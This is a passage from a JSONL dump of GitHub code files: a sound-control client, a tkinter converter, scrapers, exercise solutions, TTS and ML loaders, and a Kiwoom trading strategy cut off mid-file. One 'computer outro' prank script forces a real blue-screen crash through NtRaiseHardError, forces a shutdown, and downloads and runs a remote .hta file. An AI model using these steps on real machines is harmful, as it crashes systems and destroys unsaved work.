make_dict(WORD_LIST)\n","repo_name":"Kushagra-0801/AirDCpp-Anagram-Bot","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"43638728529","text":"#!/usr/bin/python\nfrom argparse import ArgumentTypeError\nfrom dbusclient import DBusClient, bounded\n\n\npercentage = bounded(int, 0, 100, exception_type=ArgumentTypeError)\n\nclient = DBusClient(item=\"br.ggazzi.soundctl\",\n path=\"/br/ggazzi/soundctl\",\n interface=\"br.ggazzi.soundctl\")\n\n\n\nclient.add_method('notify_volume',\n help='Issues a desktop notification with the current volume')\n\n\nmethod = client.add_method('volume_up',\n help='Increases the volume by a given amount')\nmethod.add_argument('amt', metavar='INCR', type=percentage,\n help='Amount being incremented to the volume percentage.')\n\n\nclient.add_method('volume_up_step',\n help='Increases the volume by a fixed amount.')\n\n\nmethod = client.add_method('volume_down',\n help='Decreases the volume by a given amount')\nmethod.add_argument('amt', metavar='INCR', type=percentage,\n help='Amount being decremented from the volume percentage.') \n\n\nclient.add_method('volume_down_step',\n help='Decreases the volume by a fixed amount.')\n\n\nclient.add_method('notify_outputs',\n help='Issues a notification showing the currently active output mixers.')\n\n\nclient.add_method('cycle_outputs',\n help='Cycles throught the output mixers, leaving only one of them active '\n 'at a time, and at the end of the cycle muting them all.')\n\nif __name__ == '__main__': client.run()\n","repo_name":"ggazzi/soundctld","sub_path":"src/soundctl.py","file_name":"soundctl.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40328427982","text":"from tkinter import *\n\nwindow = Tk()\nwindow.title(\"Miles to km converter\")\nwindow.minsize()\nwindow.config(padx=20, pady=20)\n\ndef convert_units():\n result = float(entry_box.get()) * 1.609\n result_label.config(text = result)\n\n# Labels\n\nmiles_label = Label(text=\"Miles\")\nmiles_label.grid(column=2, row=0)\n\nequal_label = Label(text=\"Equal to: \")\nequal_label.grid(column=0, row=1)\n\nresult_label = Label()\nresult_label.grid(column=1, row=1)\n\nkm_label = Label(text=\"km\")\nkm_label.grid(column=2, row=1)\n\n# button\n\nconvert_button = Button(text=\"calculate\",command = convert_units)\nconvert_button.grid(column=1, row=2)\n\n# entry\n\nentry_box = Entry(width = 5)\nentry_box.focus()\nentry_box.grid(column=1, row=0)\n\nwindow.mainloop()\n","repo_name":"mathitejeda/100_days_of_code","sub_path":"miles_to_km/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34866358827","text":"import requests\nfrom bs4 import BeautifulSoup\nimport os\n\nheaders = {'User-Agent':\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0\"} ##浏览器请求头(大部分网站没有这个请求头会报错、请务必加上哦)\nall_url = 'http://www.mzitu.com/all/' ##开始的URL地址\nstart_html = requests.get(all_url, headers = headers) ##使用requests中的get方法来获取all_url(就是:http://www.mzitu.com/all这个地址)的内容 headers为上面设置的请求头、请务必参考requests官方文档解释\n#print(start_html.text) ##打印出start_html (请注意,concent是二进制的数据,一般用于下载图片、视频、音频、等多媒体内容是才使用concent, 对于打印网页内容请使用text)\n\nsoup = 
BeautifulSoup(start_html.text,'lxml') ##使用Beautifusoup来解析我们获取到的网页(‘lxml’是指定解析器)\n\nli_list = soup.find_all('li') ##使用BeautifulSoup解析网页过后就可以用找标签呐!(find_all是查找指定网页内的所有标签的意思,find_all返回的是一个列表。)\n\nfor li in li_list:\n print(li)","repo_name":"wskqukq511/code","sub_path":"mzitu/mzitu.py","file_name":"mzitu.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12626678859","text":"\"\"\"\nScrape fbref for premier league fixtures and results\n\"\"\"\nimport csv\nfrom datetime import datetime\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef scrape_fixtures_for_season(season):\n # Get season start and end\n season_start = season\n season_end = season + 1\n\n # Create standings_url\n standings_url =f\"https://fbref.com/en/comps/9/{season_start}-{season_end}/schedule/{season_start}-{season_end}-Premier-League-Scores-and-Fixtures\"\n # Get data\n data = requests.get(standings_url)\n soup = BeautifulSoup(data.text, features='lxml')\n standings = soup.select('table.stats_table')[0]\n \n main_list=[]\n for team in standings.find_all('tbody'):\n rows = team.find_all('tr')\n for i in rows:\n # round and day\n round = i.find('th',{'data-stat':'gameweek'})\n if round is not None:\n Round = round.text\n day = i.find('td',{'data-stat':'dayofweek'})\n if day is not None:\n Day=day.text\n\n\n #date\n date=i.find('td',{'data-stat':'date'})\n date = date.find('a')\n if date is not None:\n Date=date.text\n #converting date formats\n date_obj = datetime.strptime(Date, \"%Y-%m-%d\")\n Date = date_obj.strftime(\"%b %d %Y\")\n\n\n #home_team\n ht= i.find('td',{'data-stat':'home_team'})\n ht=ht.find('a')\n if ht is not None:\n Ht=ht.text\n\n #score\n sc= i.find('td',{'data-stat':'score'})\n sc=sc.find('a')\n if sc is not None:\n Sc=sc.text\n\n #away_team\n at= i.find('td',{'data-stat':'away_team'})\n at=at.find('a')\n if at is not None:\n At=at.text\n\n #each game\n if Round =='':\n continue\n game = Round + ',' + Day + ' ' + Date + ',' +Ht + ',' + Sc + ',' + At\n main_list.append(game)\n main_list.sort(key = lambda x: int(x.split(',')[0]))\n\n return main_list\n\ndef save_to_csv(data_list, filename):\n with open(filename, 'w', newline='', encoding=\"utf-8\") as file:\n writer = csv.writer(file)\n writer.writerow([\"Round\", \"Date\", \"Team 1\", \"FT\", \"Team 2\"])\n for row in data_list:\n writer.writerow(row.split(','))\n\nif __name__ == \"__main__\":\n seasons = range(2020, 2023)\n all_data = []\n for season in seasons:\n all_data.extend(scrape_fixtures_for_season(season))\n save_to_csv(all_data, '../data/csv/fixture_results.csv')\n","repo_name":"RobWilliamson15/football","sub_path":"scraping/fbref_scrape.py","file_name":"fbref_scrape.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40695349289","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nclass bob(object):\r\n def hey(inputText):\r\n\r\n inputText = inputText.strip(' \\t\\n\\r')\r\n\r\n if inputText.isupper():\r\n yelling = True\r\n else:\r\n yelling = False\r\n\r\n umlauts = ['ä', 'ö', 'ü', 'ß', 'Ä', 'Ö', 'Ü']\r\n\r\n if any(e in inputText for e in umlauts):\r\n if yelling is True:\r\n return 'Woah, chill out!'\r\n else:\r\n return 'Whatever.'\r\n\r\n if inputText != '':\r\n text = inputText[-1]\r\n else:\r\n text = ''\r\n\r\n if '!' in text or yelling is True:\r\n return 'Woah, chill out!'\r\n elif '?' 
in text:\r\n return 'Sure.'\r\n elif text == '':\r\n return 'Fine. Be that way!'\r\n else:\r\n return 'Whatever.'\r\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/bob/39c2ae8760534f229928ef7ec222f040.py","file_name":"39c2ae8760534f229928ef7ec222f040.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"9915998138","text":"#%%\nimport pandas as pd \nimport os\nimport cv2\nfrom torch.utils.data import Dataset, DataLoader, RandomSampler, Subset\nimport pytorch_lightning as pl\nfrom sklearn.model_selection import train_test_split\n#%%\ndrop_ids = ['1.2.826.0.1.3680043.8.498.18630481693833135702678108074393091096']\n#%%\nclass RaznrDataset(Dataset):\n def __init__(self, df, datadir, transforms=None, sample='train'):\n self.df = df\n self.datadir = datadir\n self.transforms = transforms\n self.sample = sample\n def __len__(self):\n return len(self.df)\n def __getitem__(self, idx):\n img_id = self.df.loc[idx, 'StudyInstanceUID']\n img_path = f\"{self.datadir}/{self.sample}/{img_id}.jpg\"\n img = cv2.imread(img_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n targets = self.df.iloc[idx, 1:12].values\n if self.transforms:\n img = self.transforms(image=img)['image']\n return img, targets.astype('float32')\n\n# %%\nclass RaznrDataModule(pl.LightningDataModule):\n def __init__(self,datadir, batch_size=4, num_workers=0, val_pct=0.2, train_transforms=None, val_transforms=None, test_transforms=None):\n super(RaznrDataModule,self).__init__()\n self.datadir = datadir\n self.bs = batch_size\n self.num_workers= num_workers\n self.val_pct = val_pct\n self.train_transforms = val_transforms\n self.val_transforms = train_transforms\n self.test_transforms = test_transforms\n def prepare_data(self, *args, **kwargs):\n train_df = pd.read_csv(os.path.join(self.datadir, 'train.csv'))\n self.test_df = pd.read_csv(os.path.join(self.datadir,\"sample_submission.csv\"))\n filtered_train_df = train_df[~train_df['StudyInstanceUID'].isin(drop_ids)]\n train, val = train_test_split(filtered_train_df, test_size=self.val_pct)\n self.train_df = train.reset_index(drop=True)\n self.val_df = val.reset_index(drop=True)\n self.train_ds = RaznrDataset(self.train_df, self.datadir, transforms=self.train_transforms)\n self.val_ds = RaznrDataset(self.val_df, self.datadir, transforms=self.val_transforms)\n self.test_ds = RaznrDataset(self.test_df, self.datadir, transforms=self.test_transforms, sample='test')\n return super().prepare_data(*args, **kwargs)\n def train_dataloader(self, *args, **kwargs) -> DataLoader:\n # subset = Subset(self.train_ds, indices=range(2000))\n sampler = RandomSampler(self.train_ds)\n return DataLoader(self.train_ds, batch_size=self.bs, num_workers=self.num_workers, sampler=sampler)\n def val_dataloader(self, *args, **kwargs) -> DataLoader:\n return DataLoader(self.val_ds, batch_size=self.bs, num_workers=self.num_workers)\n def test_dataloader(self, *args, **kwargs) -> DataLoader:\n return DataLoader(self.test_ds, batch_size=self.bs, num_workers=self.num_workers)","repo_name":"kiansierra/kaggle-ranzcr","sub_path":"datamodules.py","file_name":"datamodules.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2820915940","text":"import argparse\nfrom concurrent.futures import ThreadPoolExecutor\nimport io\nimport os\nfrom typing import Optional, Any, Dict\n\nfrom 
library.lib import TTS\n# from library.lib import InferenceBackend\nfrom library.lib.wavfile import write\n\nbase = os.path.abspath(os.path.dirname(__name__))\n\nmax_thread_workers: Optional[int] = None\ntts_settings: Dict[str, Any] = {\"noise_scale\": 0.667, \"length_scale\": 1.0}\nvoc_settings: Dict[str, Any] = {\"denoiser_strength\": 0.005}\n\n\ndef main(args):\n # backend = InferenceBackend(\"pytorch\")\n executor = ThreadPoolExecutor(max_workers=max_thread_workers)\n tts = TTS(voice_or_lang=args.name,\n vocoder_or_quality=args.quality,\n backend=\"pytorch\",\n tts_settings=tts_settings,\n vocoder_settings=voc_settings,\n executor=executor,\n denoiser_strength=voc_settings[\"denoiser_strength\"],\n custom_voices_dir=f\"{base}/voices/\",\n )\n\n tts_results = tts.text_to_speech(text=args.text)\n for result_idx, result in enumerate(tts_results):\n with io.BytesIO() as wav_io:\n write(wav_io, result.sample_rate, result.audio)\n wav_data = wav_io.getvalue()\n if os.path.exists(args.save):\n os.remove(args.save)\n with open(args.save, mode='bx') as f:\n f.write(wav_data)\n\n\n# DIRECTORIES\nos.makedirs(\"samples\", exist_ok=True)\nos.makedirs(\"voices\", exist_ok=True)\n\n# SETTINGS\nparser = argparse.ArgumentParser()\nparser.add_argument('-t', '--text', help=\"Text to synthesize\")\nparser.add_argument('-n', '--name', help=\"Model name\")\nparser.add_argument('-s', '--save', default=\"samples/test.wav\", help=\"Save output\")\nparser.add_argument('-q', '--quality', choices=[\"high\", \"medium\", \"low\"], help=\"Text to synthesize\")\n\nif __name__ == '__main__':\n try:\n main(parser.parse_args())\n except KeyboardInterrupt:\n pass\n","repo_name":"Martin1403/Pytorch","sub_path":"03 - Larynx TTS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10923900718","text":"a = int(input(\"enter the number to check the number is prime or not ? \\n\"))\nif a > 1:\n \n for i in range(2, int(a / 2) + 1):\n \n if (a % i) == 0:\n print(a, \"is not a prime number\")\n break\n else:\n print(a, \"is a prime number\")\n","repo_name":"Shalini-jk/python_repo123","sub_path":"Programs2/Prime.py","file_name":"Prime.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40701178519","text":"#\n# Skeleton file for the Python \"Bob\" exercise.\n#\n\n# Bob answers 'Sure.' if you ask him a question.\n# He answers 'Whoa, chill out!' if you yell at him.\n# He says 'Fine. Be that way!' if you address him without actually saying anything.\n# He answers 'Whatever.' 
to anything else.\n\nimport unicodedata\nimport string\n\ndef remove_accents(data):\n return ''.join(x for x in unicodedata.normalize('NFKD', data) if x in string.ascii_letters)\n\ndef hey(what):\n \n #DEAL WITH UMLAUT INPUT - REPLACE ACCENT CHARS USING REMOVE_ACCENTS\n weirdchars = 0\n for i in what: \n if ord(i)>=128: weirdchars = 1\n capswords = 0\n lowerwords = 0\n if weirdchars:\n for i in what.split():\n j = remove_accents(i)\n if j.isupper():\n capswords = capswords + 1\n else:\n lowerwords = lowerwords + 1\n if capswords>lowerwords: return \"Whoa, chill out!\"\n else: return \"Whatever.\"\n\n #CHECK FOR SHOUTING - IGNORE NUMERIC WORDS\n capswords = 0\n lowerwords = 0\n for j in what.split():\n j = j.strip(',')\n if not j.isnumeric():\n if j.isupper():\n capswords = capswords + 1\n else:\n lowerwords = lowerwords + 1\n if capswords>lowerwords: return \"Whoa, chill out!\"\n\n if what.endswith('?'): return \"Sure.\"\n \n if what.isspace() or what == '': return \"Fine. Be that way!\"\n\n return \"Whatever.\"\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/bob/ac5839ef85ce49db9569f0078e073f1c.py","file_name":"ac5839ef85ce49db9569f0078e073f1c.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"16872712103","text":"#------\nfrom ctypes import windll , c_int , c_uint , c_ulong , POINTER , byref\nfrom subprocess import check_call,DEVNULL,STDOUT\nfrom sys import executable\nfrom os import path,mkdir,getcwd,system\ntry:\n from requests import get\nexcept:\n print('The requests package has not yet been installed. Pressing enter will automatically install it.')\n gh = input()\n print('Installing...')\n check_call([executable, '-m', 'pip', 'install','requests'],stdout=DEVNULL,stderr=STDOUT)\n from requests import get\n print('Done!')\n\nfrom winsound import PlaySound,SND_ASYNC\nfrom time import sleep\n\n#------\ndef getfile():\n audio = get('https://github.com/CodeSyncio/computer-outro-downloadables/blob/main/outro.wav?raw=true')\n fake = get('https://github.com/CodeSyncio/computer-outro-downloadables/blob/main/fakebsod.hta?raw=true')\n if path.exists('outro-revamped'): pass\n else: mkdir('outro-revamped')\n open(f'{getcwd()}\\\\outro-revamped\\\\outro.wav', 'wb').write(audio.content)\n open(f'{getcwd()}\\\\outro-revamped\\\\fakebsod.hta', 'wb').write(fake.content)\n system('cls')\ndef bsod():\n nullptr = POINTER(c_int)()\n windll.ntdll.RtlAdjustPrivilege(c_uint(19) , c_uint(1) , c_uint(0) , byref(c_int()))\n windll.ntdll.NtRaiseHardError(c_ulong(0xC000007B) , c_ulong(0) , nullptr , nullptr , c_uint(6) , byref(c_uint()))\n\ndef sd():\n system('shutdown /s /t 1 -c \" \"')\n sleep(10)\n\ndef fbsod():\n system(f'start {getcwd()}/outro-revamped/fakebsod.hta')\n sleep(15)\n \ndef play():\n PlaySound(f'{getcwd()}/outro-revamped/outro.wav', SND_ASYNC)\n \n#------\nif __name__ == '__main__':\n getfile()\n print('Please choose an option.\\n[1] Shutdown\\n[2] BSOD\\n[3] Fake BSOD')\n c = int(input())\n play()\n for i in range(10):\n system('cls')\n print(('BSOD 'if c ==2 else ('Shutting down 'if c ==1 else'FBSOD ')) +'in '+str(10-i) +' seconds...')\n sleep(1)\n if c == 1:\n sd()\n elif c == 2:\n sleep(0.5)\n bsod()\n else:\n fbsod()\n","repo_name":"Staniu1337/computer-outro-revamp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"68"} 
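The outro script in the record above self-installs its `requests` dependency by shelling out to pip when the import fails. A minimal standalone sketch of that pattern follows; the `ensure_package` helper name is illustrative rather than part of the script, and it assumes pip is usable from the running interpreter.

import importlib
from subprocess import check_call, DEVNULL, STDOUT
from sys import executable
from typing import Optional

def ensure_package(module_name: str, pip_name: Optional[str] = None):
    # Try the normal import first; only shell out to pip on failure.
    try:
        return importlib.import_module(module_name)
    except ImportError:
        check_call([executable, '-m', 'pip', 'install', pip_name or module_name],
                   stdout=DEVNULL, stderr=STDOUT)
        importlib.invalidate_caches()  # make the fresh install importable in-process
        return importlib.import_module(module_name)

requests = ensure_package('requests')  # same effect as the script's try/except block

Installing at import time mutates the user's environment, so this pattern suits throwaway scripts like the one above rather than libraries.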
+{"seq_id":"37027381084","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\narr = []\r\nfor _ in range(n):\r\n arr.append(int(input()))\r\narr = sorted(arr, reverse=True)\r\n\r\nanswer = 0\r\nfor i, x in enumerate(arr, start=1):\r\n tmp = x*i\r\n answer = max(answer, tmp)\r\n\r\nprint(answer)","repo_name":"muyaaho/algorithm","sub_path":"백준/Silver/2217. 로프/로프.py","file_name":"로프.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9024494409","text":"import time\r\n\r\nfrom api.Kiwoom import *\r\nfrom util.db_helper import *\r\nfrom util.time_helper import *\r\nfrom util.notifier import *\r\nimport math\r\nimport traceback\r\n\r\n\r\nclass Strategy(QThread):\r\n def __init__(self, strategy_name, get_universe, check_buy_signal, check_sell_signal):\r\n QThread.__init__(self)\r\n self.strategy_name = strategy_name\r\n self.kiwoom = Kiwoom()\r\n\r\n self.universe = {}\r\n\r\n self.round_deposit = 0\r\n self.deposit = 0\r\n\r\n self.order_wait = 60 # 체결대기시간 1분\r\n\r\n self.get_universe = get_universe\r\n self.check_buy_signal = check_buy_signal\r\n self.check_sell_signal = check_sell_signal\r\n\r\n self.is_init_success = False\r\n\r\n self.init_strategy()\r\n\r\n def init_strategy(self):\r\n try:\r\n # 유니버스 조회, 없으면 생성\r\n self.check_and_get_universe()\r\n\r\n # 가격 정보를 조회, 필요하면 생성\r\n self.check_and_get_price_data()\r\n\r\n # Kiwoom > 주문정보 확인\r\n self.kiwoom.get_order()\r\n\r\n # Kiwoom > 잔고 확인\r\n self.kiwoom.get_balance()\r\n\r\n # Kiwoom > 예수금 확인\r\n self.deposit = self.kiwoom.get_deposit()\r\n\r\n # 유니버스 실시간 체결정보 등록\r\n self.set_universe_real_time()\r\n\r\n self.is_init_success = True\r\n\r\n except Exception as e:\r\n print(traceback.format_exc())\r\n # LINE 메시지를 보내는 부분\r\n send_message(traceback.format_exc(), RSI_STRATEGY_MESSAGE_TOKEN)\r\n\r\n def run(self):\r\n \"\"\"실질적 수행 역할을 하는 함수\"\"\"\r\n while self.is_init_success:\r\n try:\r\n # 장중인지 확인\r\n if not check_transaction_open():\r\n print(\"장시간이 아니므로 5분간 대기합니다.\")\r\n time.sleep(5 * 60)\r\n continue\r\n\r\n for idx, code in enumerate(self.universe.keys()): # for each code in the universe\r\n print(self.deposit)\r\n\r\n print('[{}/{}_{}]'.format(idx + 1, len(self.universe), self.universe[code]['code_name']))\r\n time.sleep(0.5)\r\n\r\n if idx == 0:\r\n self.round_deposit = self.deposit\r\n\r\n # 접수한 주문이 있는지 확인\r\n if code in self.kiwoom.order.keys():\r\n # 미체결시간 초과시 주문 취소\r\n print(self.kiwoom.order[code]['주문시간'])\r\n if self.kiwoom.order[code]['미체결수량'] > 0 and (\r\n datetime.now() - self.kiwoom.order[code]['datetime']).total_seconds() > self.order_wait:\r\n if self.kiwoom.order[code]['주문구분'] == '매수':\r\n self.cancel_buy_order(code)\r\n elif self.kiwoom.order[code]['주문구분'] == '매도':\r\n self.cancel_sell_order(code)\r\n else: # 접수한 주문이 없을 시\r\n if code in self.kiwoom.universe_realtime_transaction_info.keys():\r\n # 보유 종목인지 확인\r\n if code in self.kiwoom.balance.keys():\r\n # 매도\r\n self.check_sell_signal_and_order(code)\r\n # 매수\r\n self.check_buy_signal_and_order(code)\r\n\r\n except Exception as e:\r\n print(traceback.format_exc())\r\n # LINE 메시지를 보내는 부분\r\n send_message(traceback.format_exc(), RSI_STRATEGY_MESSAGE_TOKEN)\r\n\r\n def check_and_get_universe(self): # 유니버스 주기적으로 업데이트 하게 하는 코드 필요\r\n \"\"\"유니버스가 존재하는지 확인하고 없으면 생성하는 함수\"\"\"\r\n if (not check_table_exist(self.strategy_name, 'universe')) or datetime.today().day == 1:\r\n universe_list = self.get_universe()\r\n print(universe_list)\r\n universe = {}\r\n # 
오늘 날짜를 20210101 형태로 지정\r\n now = datetime.now().strftime(\"%Y%m%d\")\r\n\r\n # KOSPI(0)에 상장된 모든 종목 코드를 가져와 kospi_code_list에 저장\r\n kospi_code_list = self.kiwoom.get_code_list_by_market(\"0\")\r\n\r\n # KOSDAQ(10)에 상장된 모든 종목 코드를 가져와 kosdaq_code_list에 저장\r\n kosdaq_code_list = self.kiwoom.get_code_list_by_market(\"10\")\r\n\r\n for code in kospi_code_list + kosdaq_code_list:\r\n # 모든 종목 코드를 바탕으로 반복문 수행\r\n code_name = self.kiwoom.get_master_code_name(code)\r\n\r\n # 얻어온 종목명이 유니버스에 포함되어 있다면 딕셔너리에 추가\r\n if code_name in universe_list:\r\n universe[code] = code_name\r\n\r\n # 코드, 종목명, 생성일자자를 열로 가지는 DataFrame 생성\r\n universe_df = pd.DataFrame({\r\n 'code': universe.keys(),\r\n 'code_name': universe.values(),\r\n 'created_at': [now] * len(universe.keys())\r\n })\r\n\r\n # universe라는 테이블명으로 Dataframe을 DB에 저장함\r\n insert_df_to_db(self.strategy_name, 'universe', universe_df)\r\n\r\n sql = \"select * from universe\"\r\n cur = execute_sql(self.strategy_name, sql)\r\n universe_list = cur.fetchall()\r\n for item in universe_list:\r\n idx, code, code_name, created_at = item\r\n self.universe[code] = {\r\n 'code_name': code_name\r\n }\r\n print(self.universe)\r\n\r\n def check_and_get_price_data(self):\r\n \"\"\"일봉 데이터가 존재하는지 확인하고 없다면 생성하는 함수\"\"\"\r\n for idx, code in enumerate(self.universe.keys()):\r\n print(\"({}/{}) {}\".format(idx + 1, len(self.universe), code))\r\n\r\n if check_table_exist(self.strategy_name, code):\r\n if check_transaction_closed():\r\n print(\"장 종료 시간입니다. 데이터베이스 업데이트를 시작합니다.\")\r\n # 저장된 데이터의 가장 최근 일자를 조회\r\n sql = \"select max(`{}`) from `{}`\".format('index', code)\r\n\r\n cur = execute_sql(self.strategy_name, sql)\r\n\r\n # 일봉 데이터를 저장한 가장 최근 일자를 조회\r\n last_date = cur.fetchone()\r\n\r\n # 오늘 날짜를 20210101 형태로 지정\r\n now = datetime.now().strftime(\"%Y%m%d\")\r\n\r\n # 최근 저장 일자가 오늘이 아닌지 확인\r\n if last_date[0] != now:\r\n price_df = self.kiwoom.get_price_data(code)\r\n time.sleep(0.5)\r\n # 코드를 테이블 이름으로 해서 데이터베이스에 저장\r\n insert_df_to_db(self.strategy_name, code, price_df)\r\n self.universe[code]['price_df'] = price_df\r\n else:\r\n print(\"데이터베이스에서 일봉데이터를 불러옵니다.\")\r\n sql = \"select * from `{}`\".format(code)\r\n cur = execute_sql(self.strategy_name, sql)\r\n cols = [column[0] for column in cur.description]\r\n\r\n # 데이터베이스에서 조회한 데이터를 DataFrame으로 변환해서 저장\r\n price_df = pd.DataFrame.from_records(data=cur.fetchall(), columns=cols)\r\n price_df = price_df.set_index('index')\r\n # 가격 데이터를 self.universe에서 접근할 수 있도록 저장\r\n self.universe[code]['price_df'] = price_df\r\n else:\r\n if check_transaction_closed():\r\n print(\"장 종료 시간입니다. 금일 데이터 포함 일봉 정보를 다운로드합니다.\")\r\n # API를 이용해 조회한 가격 데이터 price_df에 저장\r\n price_df = self.kiwoom.get_price_data(code)\r\n # 코드를 테이블 이름으로 해서 데이터베이스에 저장\r\n insert_df_to_db(self.strategy_name, code, price_df)\r\n time.sleep(0.5)\r\n else:\r\n print(\"장 종료 시간 전입니다. 
금일 데이터만 제외한 일봉 정보를 다운로드합니다.\")\r\n # API를 이용해 조회한 가격 데이터 price_df에 저장\r\n price_df = self.kiwoom.get_price_data(code)\r\n # 금일 데이터 제외\r\n now = datetime.now().strftime(\"%Y%m%d\")\r\n if now in price_df.index:\r\n price_df.drop(now)\r\n\r\n # 코드를 테이블 이름으로 해서 데이터베이스에 저장\r\n insert_df_to_db(self.strategy_name, code, price_df)\r\n time.sleep(0.5)\r\n\r\n def cancel_buy_order(self, code):\r\n print('미체결 시간이 초과되어 주문이 취소됩니다')\r\n\r\n quantity = self.kiwoom.order[code]['주문수량']\r\n bid = self.kiwoom.order[code]['주문가격']\r\n origin_order_number = self.kiwoom.order[code]['원주문번호']\r\n\r\n order_result = self.kiwoom.send_order('cancel_buy_order', '1011', 3, code, quantity, 0, '00', origin_order_number)\r\n\r\n # LINE 메시지를 보내는 부분\r\n message = \"[{}]buy order cancelled. quantity:{}, bid:{}, order_result:{}, deposit:{}, get_balance_count:{}, get_buy_order_count:{}, balance_len:{}\".format(\r\n code, quantity, bid, order_result, self.deposit, self.get_balance_count(), self.get_buy_order_count(),\r\n len(self.kiwoom.balance))\r\n send_message(message, RSI_STRATEGY_MESSAGE_TOKEN)\r\n\r\n def cancel_sell_order(self, code):\r\n print('미체결 시간이 초과되어 주문이 취소됩니다')\r\n\r\n quantity = self.kiwoom.order[code]['주문수량']\r\n ask = self.kiwoom.order[code]['주문가격']\r\n origin_order_number = self.kiwoom.order[code]['원주문번호']\r\n\r\n order_result = self.kiwoom.send_order('cancel_sell_order', '1011', 4, code, quantity, 0, '00', origin_order_number)\r\n\r\n # LINE 메시지를 보내는 부분\r\n message = \"[{}]sell order is cancelled. quantity:{}, ask:{}, order_result:{}\".format(code, quantity, ask,\r\n order_result)\r\n send_message(message, RSI_STRATEGY_MESSAGE_TOKEN)\r\n\r\n def order_buy(self, code, quantity):\r\n if quantity < 1:\r\n return\r\n\r\n bid = self.kiwoom.universe_realtime_transaction_info[code]['(최우선)매수호가']\r\n\r\n # 현재 예수금에서 수수료를 곱한 실제 투입금액(주문 수량 * 주문 가격)을 제외해서 계산\r\n amount = quantity * bid\r\n new_deposit = math.floor(self.deposit - amount * 1.00015)\r\n\r\n # 예수금이 0보다 작아질 정도로 주문할 수는 없으므로 체크\r\n if new_deposit < 0:\r\n return\r\n else:\r\n self.deposit = new_deposit\r\n\r\n # 계산을 바탕으로 지정가 매수 주문 접수\r\n order_result = self.kiwoom.send_order('send_buy_order', '1001', 1, code, quantity, bid, '00')\r\n\r\n # _on_chejan_slot가 늦게 동작할 수도 있기 때문에 미리 약간의 정보를 넣어둠\r\n self.kiwoom.order[code] = {'주문구분': '매수', '미체결수량': quantity}\r\n\r\n # LINE 메시지를 보내는 부분\r\n message = \"[{}]buy order is done! quantity:{}, bid:{}, order_result:{}, deposit:{}, get_balance_count:{}, get_buy_order_count:{}, balance_len:{}\".format(\r\n code, quantity, bid, order_result, self.deposit, self.get_balance_count(), self.get_buy_order_count(),\r\n len(self.kiwoom.balance))\r\n send_message(message, RSI_STRATEGY_MESSAGE_TOKEN)\r\n\r\n def order_sell(self, code, quantity):\r\n if quantity < 1:\r\n return\r\n\r\n # 보유수량보다 많이 팔수는 없음\r\n if self.kiwoom.balance[code]['보유수량'] < quantity:\r\n return self.kiwoom.balance[code]['보유수량']\r\n\r\n # 최우선 매도 호가 확인\r\n ask = self.kiwoom.universe_realtime_transaction_info[code]['(최우선)매도호가']\r\n\r\n order_result = self.kiwoom.send_order('send_sell_order', '1001', 2, code, quantity, ask, '00')\r\n\r\n # LINE 메시지를 보내는 부분\r\n message = \"[{}]sell order is done! 
quantity:{}, ask:{}, order_result:{}\".format(code, quantity, ask,\r\n                                                                                        order_result)\r\n        send_message(message, RSI_STRATEGY_MESSAGE_TOKEN)\r\n\r\n    def check_buy_signal_and_order(self, code):\r\n        quantity = self.check_buy_signal(code)\r\n        if quantity > 0:\r\n            self.order_buy(code, quantity)\r\n\r\n    def check_sell_signal_and_order(self, code):\r\n        quantity = self.check_sell_signal(code)\r\n        if quantity > 0:\r\n            self.order_sell(code, quantity)\r\n\r\n    def set_universe_real_time(self):\r\n        \"\"\"유니버스 실시간 체결정보 수신 등록하는 함수\"\"\"\r\n        # 임의의 fid를 하나 전달하기 위한 코드(아무 값의 fid라도 하나 이상 전달해야 정보를 얻어올 수 있음)\r\n        fids = get_fid(\"체결시간\")\r\n\r\n        # 장운영구분을 확인하고 싶으면 사용할 코드\r\n        # self.kiwoom.set_real_reg(\"1000\", \"\", get_fid(\"장운영구분\"), \"0\")\r\n\r\n        # universe 딕셔너리의 key값들은 종목코드들을 의미\r\n        codes = self.universe.keys()\r\n\r\n        # 종목코드들을 ';'을 기준으로 묶어주는 작업\r\n        codes = \";\".join(map(str, codes))\r\n\r\n        # 화면번호 9999에 종목코드들의 실시간 체결정보 수신을 요청\r\n        self.kiwoom.set_real_reg(\"9999\", codes, fids, 